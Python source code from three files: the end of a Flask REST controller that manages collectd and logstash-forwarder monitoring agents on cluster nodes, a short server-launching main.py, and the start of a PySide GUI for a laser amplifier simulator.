nodeCollectdRunning.append(CollectdNodes)
i.nCollectdState = 'Stopped'
response = jsonify({'Status': 'Collectd stopped', 'Nodes': nodeCollectdRunning})
response.status_code = 200
return response
if auxComp == "lsf":
qNLsf = dbNodes.query.filter_by(nLogstashForwState='Running').all()
if not qNLsf:
response = jsonify({'Status': 'No nodes in state Running!'})
response.status_code = 404
return response
nodeLsfRunning = []
for i in qNLsf:
node = []
node.append(i.nodeIP)
try:
serviceCtrl(node, i.nUser, i.nPass, 'logstash-forwarder', 'stop')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot stop lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error Stopping LSF on ' + i.nodeFQDN + '!'})
response.status_code = 500
return response
LsfNodes = {}
LsfNodes['Node'] = i.nodeFQDN
LsfNodes['IP'] = i.nodeIP
nodeLsfRunning.append(LsfNodes)
i.nLogstashForwState = 'Stopped'
response = jsonify({'Status': 'LSF stopped', 'Nodes': nodeLsfRunning})
response.status_code = 200
return response
@dmon.route('/v1/overlord/aux/<auxComp>/<nodeFQDN>/start')
@api.doc(params={'auxComp': 'Aux Component', 'nodeFQDN': 'Node FQDN'})
class AuxStartSelective(Resource):
def post(self, auxComp, nodeFQDN):
auxList = ['collectd', 'lsf']
if auxComp not in auxList:
response = jsonify({'Status': 'No such such aux component ' + auxComp})
response.status_code = 400
return response
qAux = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qAux is None:
response = jsonify({'Status': 'Unknown node ' + nodeFQDN})
response.status_code = 404
return response
node = []
node.append(qAux.nodeIP)
if auxComp == 'collectd':
if qAux.nCollectdState != 'None':
try:
serviceCtrl(node, qAux.nUser, qAux.nPass, 'collectd', 'restart')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot restart collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error restarting collectd on ' + nodeFQDN + '!'})
response.status_code = 500
return response
response = jsonify({'Status': 'Collectd restarted on ' + nodeFQDN})
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Need to deploy collectd first!'})
response.status_code = 403
return response
if auxComp == 'lsf':
if qAux.nLogstashForwState != 'None':
try:
serviceCtrl(node, qAux.nUser, qAux.nPass, 'logstash-forwarder', 'restart')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot restart lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error restarting LSF on ' + nodeFQDN + '!'})
response.status_code = 500
return response
response = jsonify({'Status': 'LSF restarted on ' + nodeFQDN})
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Need to deploy LSF first!'})
response.status_code = 403
return response
@dmon.route('/v1/overlord/aux/<auxComp>/<nodeFQDN>/stop')
@api.doc(params={'auxComp': 'Aux Component', 'nodeFQDN': 'Node FQDN'})
class AuxStopSelective(Resource):
def post(self, auxComp, nodeFQDN):
auxList = ['collectd', 'lsf']
if auxComp not in auxList:
response = jsonify({'Status': 'No such aux component ' + auxComp})
response.status_code = 400
return response
qAux = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qAux is None:
response = jsonify({'Status': 'Unknown node ' + nodeFQDN})
response.status_code = 404
return response
node = []
node.append(qAux.nodeIP)
if auxComp == 'collectd':
if qAux.nCollectdState == 'Running':
try:
serviceCtrl(node, qAux.nUser, qAux.nPass, 'collectd', 'stop')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot stop collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error stopping collectd on ' + nodeFQDN + '!'})
response.status_code = 500
return response
qAux.nCollectdState = 'Stopped'
response = jsonify({'Status': 'Collectd stopped on ' + nodeFQDN})
response.status_code = 200
return response
else:
response = jsonify({'Status': 'No running Collectd instance found!'})
response.status_code = 403
return response
if auxComp == 'lsf':
if qAux.nLogstashForwState == 'Running':
try:
serviceCtrl(node, qAux.nUser, qAux.nPass, 'logstash-forwarder', 'stop')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot stop lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error stopping LSF on ' + nodeFQDN + '!'})
response.status_code = 500
return response
qAux.nCollectdState = 'Stopped'
response = jsonify({'Status': 'LSF stopped on ' + nodeFQDN})
response.status_code = 200
return response
else:
response = jsonify({'Status': 'No running LSF instance found!'})
response.status_code = 403
return response
@dmon.route('/v2/overlord/aux/<auxComp>/<nodeFQDN>/start')
@api.doc(params={'auxComp': 'Aux Component', 'nodeFQDN': 'Node FQDN'})
class AuxStartSelectiveThreaded(Resource):
def post(self, auxComp, nodeFQDN):
auxList = ['collectd', 'lsf', 'jmx', 'all']
if auxComp not in auxList:
response = jsonify({'Status': 'No such such aux component ' + auxComp})
response.status_code = 400
return response
qAux = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qAux is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found!'})
response.status_code = 404
return response
node = []
node.append(qAux.nodeIP)
agentr = AgentResourceConstructor(node, '5222')
if auxComp == 'all':
resourceList = agentr.start()
else:
resourceList = agentr.startSelective(auxComp)
try:
r = requests.post(resourceList[0], timeout=DMON_TIMEOUT)
# data = r.text
except requests.exceptions.Timeout:
response = jsonify({'Status': 'Timeout',
'Message': 'Request timedout!'})
response.status_code = 408
return response
except requests.exceptions.ConnectionError:
response = jsonify({'Status': 'Error',
'Message': 'Connection Error!'})
response.status_code = 404
return response
if auxComp is 'collectd':
qAux.nCollectdState = 'Running'
elif auxComp is 'lsf':
qAux.nLogstashForwState = 'Running'
else:
qAux.nCollectdState = 'Running'
qAux.nLogstashForwState = 'Running'
response = jsonify({'Status': 'Success',
'Message': 'Component ' + auxComp + ' started!'})
response.status_code = 200
return response
@dmon.route('/v2/overlord/aux/<auxComp>/<nodeFQDN>/stop')
@api.doc(params={'auxComp': 'Aux Component', 'nodeFQDN': 'Node FQDN'})
class AuxStopSelectiveThreaded(Resource):
def post(self, auxComp, nodeFQDN):
auxList = ['collectd', 'lsf', 'jmx', 'all']
if auxComp not in auxList:
response = jsonify({'Status': 'No such such aux component ' + auxComp})
response.status_code = 400
return response
qAux = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qAux is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found!'})
response.status_code = 404
return response
node = []
node.append(qAux.nodeIP)
agentr = AgentResourceConstructor(node, '5222')
if auxComp == 'all':
resourceList = agentr.stop()
else:
resourceList = agentr.stopSelective(auxComp)
try:
r = requests.post(resourceList[0], timeout=DMON_TIMEOUT)
# data = r.text
except requests.exceptions.Timeout:
response = jsonify({'Status': 'Timeout',
'Message': 'Request timedout!'})
response.status_code = 408
return response
except requests.exceptions.ConnectionError:
response = jsonify({'Status': 'Error',
'Message': 'Connection Error!'})
response.status_code = 404
return response
if auxComp is 'collectd':
qAux.nCollectdState = 'Stopped'
elif auxComp is 'lsf':
qAux.nLogstashForwState = 'Stopped'
else:
qAux.nCollectdState = 'Stopped'
qAux.nLogstashForwState = 'Stopped'
response = jsonify({'Status': 'Success',
'Message': 'Component ' + auxComp + ' stopped!'})
response.status_code = 200
return response
# return "same as v1" # TODO: stop selected component
@dmon.route('/v2/overlord/aux/<auxComp>/start')
@api.doc(params={'auxComp': 'Aux Component'})
class AuxStartAllThreaded(Resource):
def post(self, auxComp):
auxList = ['collectd', 'lsf', 'jmx', 'all']
if auxComp not in auxList:
response = jsonify({'Status': 'No such such aux component ' + auxComp})
response.status_code = 400
return response
qNodes = db.session.query(dbNodes.nodeIP).all()
if not qNodes:
response = jsonify({'Status': 'No nodes registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes registrerd',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nList = []
for n in qNodes:
nList.append(n[0])
agentr = AgentResourceConstructor(nList, '5222')
if auxComp == 'all':
resourceList = agentr.start()
else:
resourceList = agentr.startSelective(auxComp)
dmon = GreenletRequests(resourceList)
nodeRes = dmon.parallelPost(None)
# TODO: create parallel request response parse function
failedNodes = []
for n in nodeRes:
nodeIP = urlparse(n['Node'])
qNode = dbNodes.query.filter_by(nodeIP=nodeIP.hostname).first()
# print n['StatusCode']
if n['StatusCode'] != 200:
failedNodes.append({'NodeIP': str(nodeIP.hostname),
'Code': n['StatusCode']})
qNode.nCollectdState = 'unknown'
qNode.nLogstashForwState = 'unknown'
else:
qNode.nCollectdState = 'Running'
qNode.nLogstashForwState = 'Running'
response = jsonify({'Status': 'Running ' + auxComp,
'Message': 'Updated Status',
'Failed': failedNodes})
response.status_code = 200
dmon.reset()
return response
@dmon.route('/v2/overlord/aux/<auxComp>/stop')
@api.doc(params={'auxComp': 'Aux Component'})
class AuxStopAllThreaded(Resource):
def post(self, auxComp):
auxList = ['collectd', 'lsf', 'jmx', 'all']
if auxComp not in auxList:
response = jsonify({'Status': 'No such such aux component supported' + auxComp})
response.status_code = 400
return response
qNodes = db.session.query(dbNodes.nodeIP).all()
if not qNodes:
response = jsonify({'Status': 'No nodes registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes registrerd',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nList = []
for n in qNodes:
nList.append(n[0])
agentr = AgentResourceConstructor(nList, '5222')
if auxComp == 'all':
resourceList = agentr.stop()
else:
resourceList = agentr.stopSelective(auxComp)
dmon = GreenletRequests(resourceList)
nodeRes = dmon.parallelPost(None)
# TODO: create parallel request response parse function
failedNodes = []
for n in nodeRes:
nodeIP = urlparse(n['Node'])
qNode = dbNodes.query.filter_by(nodeIP=nodeIP.hostname).first()
# print n['StatusCode']
if n['StatusCode'] != 200:
failedNodes.append({'NodeIP': str(nodeIP.hostname),
'Code': n['StatusCode']})
qNode.nCollectdState = 'unknown'
qNode.nLogstashForwState = 'unknown'
elif len(resourceList) == 1:
if auxComp == 'collectd':
qNode.nCollectdState = 'Stopped'
if auxComp == 'lsf':
qNode.nLogstashForwState = 'Stopped'
else:
qNode.nCollectdState = 'Stopped'
qNode.nLogstashForwState = 'Stopped'
response = jsonify({'Status': 'Stopped ' + auxComp,
'Message': 'Updated Status',
'Failed': failedNodes})
response.status_code = 200
dmon.reset()
return response
@dmon.route('/v2/overlord/aux/<auxComp>/configure') #this is the correct one for configuring components
class AuxConfigureCompTreaded(Resource):
def post(self, auxComp):
auxList = ['collectd', 'lsf', 'jmx'] #TODO: add all, will need some concurency on dmon-agent part
if auxComp not in auxList:
response = jsonify({'Status': 'No such such aux component supported ' + auxComp})
response.status_code = 400
app.logger.warning('[%s] : [WARNING] Aux Components %s not supported',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), auxComp)
return response
qNodes = db.session.query(dbNodes.nodeIP, dbNodes.nMonitored, dbNodes.nRoles).all()
nList = []
nRoles = []
for n in qNodes:
if not n[1]:
break
nList.append(n[0])
nRoles.append(n[2])
if not nList:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No monitored nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), auxComp)
return response
uList = []
for r in nRoles:
uList.append(r.split(', '))
uniqueRoles = set(x for l in uList for x in l)
uniqueRolesList = list(uniqueRoles)
# todo ad support on a per node bases for roles not global unique list
app.logger.info('[%s] : [INFO] Unique roles %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(uniqueRolesList))
agentr = AgentResourceConstructor(nList, '5222')
qMetPer = dbMetPer.query.first()
if auxComp == 'collectd':
resFin = {}
resourceList = agentr.collectd()
for n in resourceList:
payload = {}
nIP = urlparse(n).hostname
qNodeSpec = dbNodes.query.filter_by(nodeIP=nIP).first() #TODO: unify db foreign keys in tables
qLSSpec = dbSCore.query.filter_by(hostIP=qNodeSpec.nLogstashInstance).first()
if qLSSpec is None:
response = jsonify({'Status': 'No logstash instance found'})
response.status_code = 404
app.logger.warning('[%s] : [WARNING] No Logstash instance found with IP %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(qNodeSpec.nLogstashInstance))
return response
payload['Interval'] = qMetPer.sysMet
payload['LogstashIP'] = qNodeSpec.nLogstashInstance
payload['UDPPort'] = str(qLSSpec.udpPort)
if 'cassandra' in uniqueRolesList:
payload['Cassandra'] = 1
else:
payload['Cassandra'] = 0
if 'mongodb' in uniqueRolesList:
qBDS = dbBDService.query.first()
if qBDS is None:
app.logger.warning('[%s] : [WARNING] MongoDB role found but no settings detected',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
pass
else:
payload['MongoDB'] = 1
payload['MongoHost'] = qBDS.mongoHost
payload['MongoDBPort'] = qBDS.mongoPort
payload['MongoDBUser'] = qBDS.mongoUser
payload['MongoDBPasswd'] = qBDS.mongoPswd
payload['MongoDBs'] = qBDS.mongoDBs
app.logger.info('[%s] : [INFO] MongoDB role found added settings to queue',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
resFin[n] = payload
if auxComp == 'lsf':
resFin = {}
resourceList = agentr.lsf()
for n in resourceList:
payload = {}
nIP = urlparse(n).hostname
qNodeSpec = dbNodes.query.filter_by(nodeIP=nIP).first() #TODO: same as for collectd remove duplicate code
qLSSpec = dbSCore.query.filter_by(hostIP=qNodeSpec.nLogstashInstance).first()
payload['LogstashIP'] = qNodeSpec.nLogstashInstance
payload['LumberjackPort'] = qLSSpec.inLumberPort
resFin[n] = payload
if auxComp == 'jmx':
response = jsonify({'Status': 'Deprecated', 'Message': 'Use GenericJMX'})
response.status_code = 200
return response
# if auxComp == 'all':
# resourceCollectd = agentr.collectd()
# resourceLSF = agentr.lsf()
app.logger.info('[%s] : [INFO] Resources with payload -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(resFin))
dmon = GreenletRequests(resFin)
nodeRes = dmon.parallelPost(None)
app.logger.info('[%s] : [INFO] Resources responses -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeRes))
failedNodes = []
for n in nodeRes:
nodeIP = urlparse(n['Node'])
qNode = dbNodes.query.filter_by(nodeIP=nodeIP.hostname).first()
# print n['StatusCode']
if n['StatusCode'] != 200:
failedNodes.append({'NodeIP': str(nodeIP.hostname),
'Code': n['StatusCode']})
qNode.nCollectdState = 'unknown'
qNode.nLogstashForwState = 'unknown'
response = jsonify({'Status': 'Reconfigured ' + auxComp,
'Message': 'Updated Status',
'Failed': failedNodes})
response.status_code = 200
app.logger.info('[%s] : [INFO] Component %s reconfigure, failed %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(auxComp), str(failedNodes))
dmon.reset()
return response
@dmon.route('/v1/overlord/aux/interval')
class AuxInterval(Resource):
def get(self):
qInterv = dbMetPer.query.first()
if qInterv is None:
response = jsonify({'Status': 'No metrics interval has been set'})
response.status_code = 404
app.logger.warning('[%s] : [WARNING] No metrics interval has been set',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
else:
response = jsonify({'System': qInterv.sysMet,
'YARN': qInterv.yarnMet,
'Spark': qInterv.sparkMet,
'Storm': qInterv.stormMet})
response.status_code = 200
app.logger.info('[%s] : [INFO] Returned metrics poll rate; System -> %s, YARN -> %s, Spark -> %s, Storm -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
qInterv.sysMet, qInterv.yarnMet, qInterv.sparkMet, qInterv.stormMet)
return response
@api.expect(resInterval)
def put(self):
if not request.json:
abort(400)
if 'Spark' not in request.json:
spark = '15'
else:
spark = request.json['Spark']
if 'Storm' not in request.json:
storm = '60'
else:
storm = request.json['Storm']
if 'YARN' not in request.json:
yarn = '15'
else:
yarn = request.json['YARN']
if 'System' not in request.json:
system = '15'
else:
system = request.json['System']
app.logger.info('[%s] : [INFO] Values; System -> %s, YARN -> %s, Spark -> %s, Storm -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), system, yarn, spark, storm)
qInterv = dbMetPer.query.first()
if qInterv is None:
upMet = dbMetPer(sysMet=system, yarnMet=yarn, stormMet=storm, sparkMet=spark)
db.session.add(upMet)
db.session.commit()
response = jsonify({'Status': 'Added metrics interval values'})
response.status_code = 201
app.logger.info('[%s] : [INFO] Added Metrics interval values',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
else:
if 'Spark' not in request.json:
app.logger.info('[%s] : [INFO] Spark not in request. Value unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
pass
elif request.json['Spark'] == spark:
qInterv.sparkMet = spark
if 'Storm' not in request.json:
app.logger.info('[%s] : [INFO] Storm not in request. Value unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
pass
elif request.json['Storm'] == storm:
qInterv.stormMet = storm
if 'YARN' not in request.json:
app.logger.info('[%s] : [INFO] YARN not in request. Value unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
pass
elif request.json['YARN'] == yarn:
qInterv.yarnMet = yarn
if 'System' not in request.json:
app.logger.info('[%s] : [INFO] System not in request. Value unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
pass
elif request.json['System'] == system:
qInterv.sysMet = system
db.session.commit()
response = jsonify({'Status': 'Updated metrics interval values'})
response.status_code = 200
app.logger.info('[%s] : [INFO] Updated Metrics interval values',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
@dmon.route('/vx/reset/<type>')
class DMONReset(Resource):
def post(self, type):
listP = ['status', 'monitored']
if type not in listP:
return "Not Supported"
qn = dbNodes.query.all()
for n in qn:
if type == 'status':
print str(n.nStatus)
n.nStatus = 0
print str(n.nStatus)
elif type == 'monitored':
print str(n.nMonitored)
n.nMonitored = 0
print str(n.nMonitored)
return "Done"
@dmon.route('/vx/test')
class WTF(Resource):
def get(self):
qESCore = dbESCore.query.filter_by(MasterNode=1).first()
return qESCore.nodePort
@dmon.route('/vx/timeout')
class CheckTimeout(Resource):
def get(self):
try:
timeOut = os.environ.get('DMON_TIMEOUT')
except Exception as inst:
response = jsonify({'Status': 'Error fetching env variable'})
response.status_code = 500
return response
response = jsonify({'Timeout': timeOut,
'Default': os.getenv('DMON_TIMEOUT', 5)})
response.status_code = 200
return response
"""
Custom errot Handling
"""
@app.errorhandler(403)
def forbidden(e):
response = jsonify({'error': 'forbidden'})
response.status_code = 403
return response
@app.errorhandler(404)
def page_not_found(e):
response = jsonify({'error': 'not found'})
response.status_code = 404
return response
@app.errorhandler(500)
def internal_server_error(e):
response = jsonify({'error': 'internal server error'})
response.status_code = 500
return response
@app.errorhandler(405)
def meth_not_allowed(e):
response = jsonify({'error': 'method not allowed'})
response.status_code = 405
return response
@api.errorhandler(400)
def bad_request(e):
response = jsonify({'error': 'bad request'})
response.status_code = 400
return response
@api.errorhandler(415)
def bad_mediatype(e):
response = jsonify({'error': 'unsupported media type'})
response.status_code = 415
return response
if __name__ == '__main__':
handler = RotatingFileHandler(logDir + '/dmon-controller.log', maxBytes=10000000, backupCount=5)
handler.setLevel(logging.INFO)
app.logger.addHandler(handler)
log = logging.getLogger('werkzeug')
log.setLevel(logging.DEBUG)
log.addHandler(handler)
#DB Initialization
# app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(baseDir, 'dmon.db')
# app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
# db.create_all()
if len(sys.argv) == 1:
app.run(port=5001, debug=True, threaded=True)
else:
app.run(host='0.0.0.0', port=8080, debug=True)
|
main.py
|
import threading
from .threads import threader
from .server.server import start_server
threader.monkey_patch_threads()
t = threading.Thread(name="PoolHub Server", target=start_server, daemon=True)
t.start()
|
gnpamp.py
|
#!/usr/bin/env python
# Copyright (C) 2012 Victor Semionov
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import os
import signal
import threading
import multiprocessing
import getopt
import re
from PySide import QtCore, QtGui
import model
import meta
import npamp
import unitconv
import mainwin
import outwin
old_excepthook = None
debug_mode = False
predef_attr_reprs = [("inf", "float(\"inf\")"), ("nan", "float(\"nan\")")]
predef_attrs = [(name, eval(value)) for (name, value) in predef_attr_reprs]
defaults = npamp.cfg.load_conf(npamp.params.__dict__, None)
def boot_excepthook(exc_type, value, traceback):
if debug_mode and old_excepthook:
old_excepthook(exc_type, value, traceback)
QtGui.QMessageBox.critical(None, "%s Error" % meta.app_name, str(value))
def init_app_dir():
try:
os.mkdir(npamp.app_dir)
except OSError:
pass
def repr_cfg(v):
return re.sub("<class '([^']+?)'>", "\\1", repr(v))
def file2conf(path):
conf = npamp.cfg.load_conf(defaults, path)
return conf
def conf2file(conf, path):
with open(path, "w") as fp:
fp.write("import model\n")
fp.write("\n")
fp.write("%s = %s\n" % ("version", npamp.params.version))
fp.write("\n")
for name, value in predef_attr_reprs:
fp.write("%s = %s\n" % (name, value))
fp.write("\n")
for param, value in sorted(conf.items()):
fp.write("%s = %s\n" % (param, repr_cfg(value)))
fp.write("\n")
for name, _ in predef_attr_reprs:
fp.write("del %s\n" % name)
class AppWindow(QtGui.QMainWindow, mainwin.Ui_MainWindow):
untitled_name = "Untitled.%s" % meta.file_extension
file_filters = "%s Files (*.%s);;All Files (%s)" % (meta.app_name, meta.file_extension, "*.*" if os.name == "nt" else "*")
def __init__(self, extensions):
QtGui.QMainWindow.__init__(self)
self.extensions = extensions
self.monitor_pipe = multiprocessing.Pipe(False)
self.old_excepthook = None
self.widget_module_map = dict()
self.working_conf = npamp.cfg.copy_conf(defaults)
self.working_path = None
self.output_path = None
self.default_directory = self.get_default_directory()
self.setupUi(self)
self.initWidgets()
self.connectSignals()
self.updateUI()
self.conf2gui(defaults)
self.resize(self.sizeHint())
def add_excepthook(self):
self.old_excepthook = sys.excepthook
sys.excepthook = self.gui_excepthook
def gui_excepthook(self, exc_type, value, traceback):
if debug_mode and self.old_excepthook:
self.old_excepthook(exc_type, value, traceback)
QtGui.QMessageBox.critical(self, "Error", str(value))
def get_default_directory(self):
if os.name == "nt":
import winshell
return winshell.desktop()
else:
home_dir = QtCore.QDir.toNativeSeparators(QtCore.QDir.homePath())
return home_dir
def initWidgets(self):
for name in dir(model.beam):
obj = getattr(model.beam, name)
if type(obj) is type and issubclass(obj, model.beam.BeamProfile) and obj is not model.beam.BeamProfile:
self.comboBox_beam_class.addItem(name)
self.widget_module_map[self.comboBox_beam_class.objectName()] = model.beam
for name in dir(model.pulse):
obj = getattr(model.pulse, name)
if type(obj) is type and issubclass(obj, model.pulse.SinglePulse) and obj is not model.pulse.SinglePulse:
self.comboBox_pulse_class.addItem(name)
self.widget_module_map[self.comboBox_pulse_class.objectName()] = model.pulse
for name in dir(model.depop):
obj = getattr(model.depop, name)
if type(obj) is type and issubclass(obj, model.depop.DepopulationModel) and hasattr(obj, "concrete") and obj.concrete is True:
self.comboBox_depop_model_class.addItem(name)
self.comboBox_ext_alt_depop_model.addItem(name)
self.listWidget_ext_depop_models.addItem(name)
self.widget_module_map[self.comboBox_depop_model_class.objectName()] = model.depop
self.widget_module_map[self.comboBox_ext_alt_depop_model.objectName()] = model.depop
self.widget_module_map[self.listWidget_ext_depop_models.objectName()] = model.depop
for name in dir(model.inverter):
obj = getattr(model.inverter, name)
if type(obj) is type and issubclass(obj, model.inverter.PopulationInverter) and obj is not model.inverter.PopulationInverter:
self.comboBox_inverter_class.addItem(name)
self.widget_module_map[self.comboBox_inverter_class.objectName()] = model.inverter
for name in dir(model.integrator):
obj = getattr(model.integrator, name)
if type(obj) is type and issubclass(obj, model.integrator.NumericalIntegrator) and obj is not model.integrator.NumericalIntegrator:
self.listWidget_integrator_classes.addItem(name)
self.widget_module_map[self.listWidget_integrator_classes.objectName()] = model.integrator
self.listWidget_integrator_classes.resize(self.listWidget_integrator_classes.sizeHint())
for name in dir(model.amplifier):
obj = getattr(model.amplifier, name)
if type(obj) is type and issubclass(obj, model.amplifier.NumericalAmplifier) and obj is not model.amplifier.NumericalAmplifier:
self.listWidget_amplifier_classes.addItem(name)
self.widget_module_map[self.listWidget_amplifier_classes.objectName()] = model.amplifier
self.listWidget_amplifier_classes.resize(self.listWidget_amplifier_classes.sizeHint())
def shortFilename(self):
return os.path.splitext(os.path.basename(self.working_path or self.untitled_name))[0]
def updateUI(self):
filename = self.shortFilename()
self.setWindowTitle("%s - %s" % (filename, meta.gui_app_name))
self.actionClose.setEnabled(self.working_path is not None)
def conf2gui(self, conf):
def set_widget_value(label, widget, value):
if type(widget) is QtGui.QLineEdit:
if type(value) is float:
value = unitconv.convert_to_input(label.text(), value)
widget.setText(repr_cfg(value))
elif type(widget) is QtGui.QSpinBox:
widget.setValue(value)
elif type(widget) is QtGui.QCheckBox:
widget.setChecked(value)
elif type(widget) is QtGui.QComboBox:
widget.setCurrentIndex(widget.findText(value.__name__))
elif type(widget) is QtGui.QListWidget:
widget.setCurrentItem(None, QtGui.QItemSelectionModel.Clear)
for v in value:
item = widget.findItems(v.__name__, QtCore.Qt.MatchExactly|QtCore.Qt.MatchCaseSensitive)[0]
widget.setCurrentItem(item, QtGui.QItemSelectionModel.Select)
elif type(widget) is QtGui.QWidget:
children = [w for w in widget.findChildren(QtGui.QWidget) if w.parent() is widget]
assert len(children) == len(value), "wrong data length"
children.sort(key = lambda item: item.objectName())
for w, v in zip(children, value):
set_widget_value(label, w, v)
else:
assert False, "unhandled widget type"
for parameter, value in conf.items():
children = self.centralWidget().findChildren(QtGui.QWidget, QtCore.QRegExp("^[^_]+_%s$" % parameter))
widgets = [w for w in children if type(w) is not QtGui.QLabel]
labels = [w for w in children if type(w) is QtGui.QLabel]
assert len(widgets) == 1, "none or more than one widget matches parameter name \"%s\"" % parameter
assert len(labels) == 1, "none or more than one label matches parameter name \"%s\"" % parameter
set_widget_value(labels[0], widgets[0], value)
if self.gui2conf() != conf:
raise npamp.cfg.ConfigurationError("invalid parameter value(s)")
def gui2conf(self):
def get_widget_value(label, widget, defval):
def item2class(w, t):
module = self.widget_module_map[w.objectName()]
cls = getattr(module, t)
return cls
if type(widget) is QtGui.QLineEdit:
if type(defval) is float:
value = widget.text()
value = unitconv.convert_from_input(label.text(), value)
return value
else:
glb = dict(predef_attrs)
glb["model"] = npamp.model
return eval(widget.text(), glb)
elif type(widget) is QtGui.QSpinBox:
return widget.value()
elif type(widget) is QtGui.QCheckBox:
return widget.isChecked()
elif type(widget) is QtGui.QComboBox:
return item2class(widget, widget.currentText())
elif type(widget) is QtGui.QListWidget:
clsnames = map(lambda item: item.text(), widget.selectedItems())
classes = map(lambda clsname: item2class(widget, clsname), clsnames)
return list(classes)
elif type(widget) is QtGui.QWidget:
children = [w for w in widget.findChildren(QtGui.QWidget) if w.parent() is widget]
assert len(children) == len(defval), "wrong data length"
children.sort(key = lambda item: item.objectName())
return type(defval)(map(lambda wv: get_widget_value(label, *wv), zip(children, defval)))
else:
assert False, "unhandled widget type"
conf = dict()
for parameter, default in defaults.items():
children = self.centralWidget().findChildren(QtGui.QWidget, QtCore.QRegExp("^[^_]+_%s$" % parameter))
widgets = [w for w in children if type(w) is not QtGui.QLabel]
labels = [w for w in children if type(w) is QtGui.QLabel]
assert len(widgets) == 1, "none or more than one widget matches parameter name \"%s\"" % parameter
assert len(labels) == 1, "none or more than one label matches parameter name \"%s\"" % parameter
value = get_widget_value(labels[0], widgets[0], default)
conf[parameter] = value
return conf
def connectSignals(self):
